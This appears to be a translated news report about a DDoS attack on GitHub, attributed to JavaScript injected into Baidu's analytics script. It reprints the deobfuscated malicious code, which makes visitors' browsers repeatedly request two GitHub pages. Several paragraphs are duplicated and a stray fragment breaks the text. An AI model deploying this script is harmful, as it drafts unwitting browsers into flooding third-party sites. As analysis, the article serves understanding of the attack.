Github second day keeps against DDoS-attack
Github more than 24 hours withstands continuous DDoS-attack. The current status is periodically reported on twitter @GithubStatus and on page https://status.github.com/ .
The service is no longer available for some users. Last message on Twitter two hours ago .
Apparently, the attack is of Chinese origin. There is evidence that some visitors to the largest Baidu search engine in China are deploying an HTTP script into HTTP packages that every two seconds request github.com/greatfire and github.com/cn-nytimes from Github.
The malicious script is hm.baidu.com/h.js . It should be empty, but after an HTTP injection it receives such content.
')
If this is indeed the case, then the DDoS attack may be political in nature and, possibly, conducted with the participation of government agencies with the help of deep traffic inspection. Perhaps the authorities are trying to make it difficult to access software tools at the above addresses. This VPN and other programs to circumvent the Chinese censorship.
As a result of DDoS attacks, all other Github users are affected.
By the way, GreatFire administrators a week ago reported about the outbreak of a DDoS attack with a capacity of approximately 2.6 billion requests per hour (approximately 2500 times higher than the usual level). Activists have to pay $ 30,000 per day for Amazon traffic.
The service is no longer available for some users. Last message on Twitter two hours ago .
Apparently, the attack is of Chinese origin. There is evidence that some visitors to the largest Baidu search engine in China are deploying an HTTP script into HTTP packages that every two seconds request github.com/greatfire and github.com/cn-nytimes from Github.
The malicious script is hm.baidu.com/h.js . It should be empty, but after an HTTP injection it receives such content.
')
Listing after deobfuscation
document.write("<script src="http://libs.baidu.com/jquery/2.0.0/jquery.min.js">// <![CDATA[ \x3c/script>"); !window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>"); startime = (new Date).getTime(); var count = 0; function unixtime() { var a = new Date; return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3 } url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"]; NUM = url_array.length; function r_send2() { var a = unixtime() % NUM; get(url_array[a]) } function get(a) { var b; $.ajax({ url: a, dataType: "script", timeout: 1E4, cache: !0, beforeSend: function() { requestTime = (new Date).getTime() }, complete: function() { responseTime = (new Date).getTime(); b = Math.floor(responseTime - requestTime); 3E5 > responseTime - startime && (r_send(b), count += 1) } }) } function r_send(a) { setTimeout("r_send2()", a) } setTimeout("r_send2()", 2E3); If this is indeed the case, then the DDoS attack may be political in nature and, possibly, conducted with the participation of government agencies with the help of deep traffic inspection. Perhaps the authorities are trying to make it difficult to access software tools at the above addresses. This VPN and other programs to circumvent the Chinese censorship.
As a result of DDoS attacks, all other Github users are affected.
By the way, GreatFire administrators a week ago reported about the outbreak of a DDoS attack with a capacity of approximately 2.6 billion requests per hour (approximately 2500 times higher than the usual level). Activists have to pay $ 30,000 per day for Amazon traffic.
Source: https://habr.com/ru/post/356702/
All Articles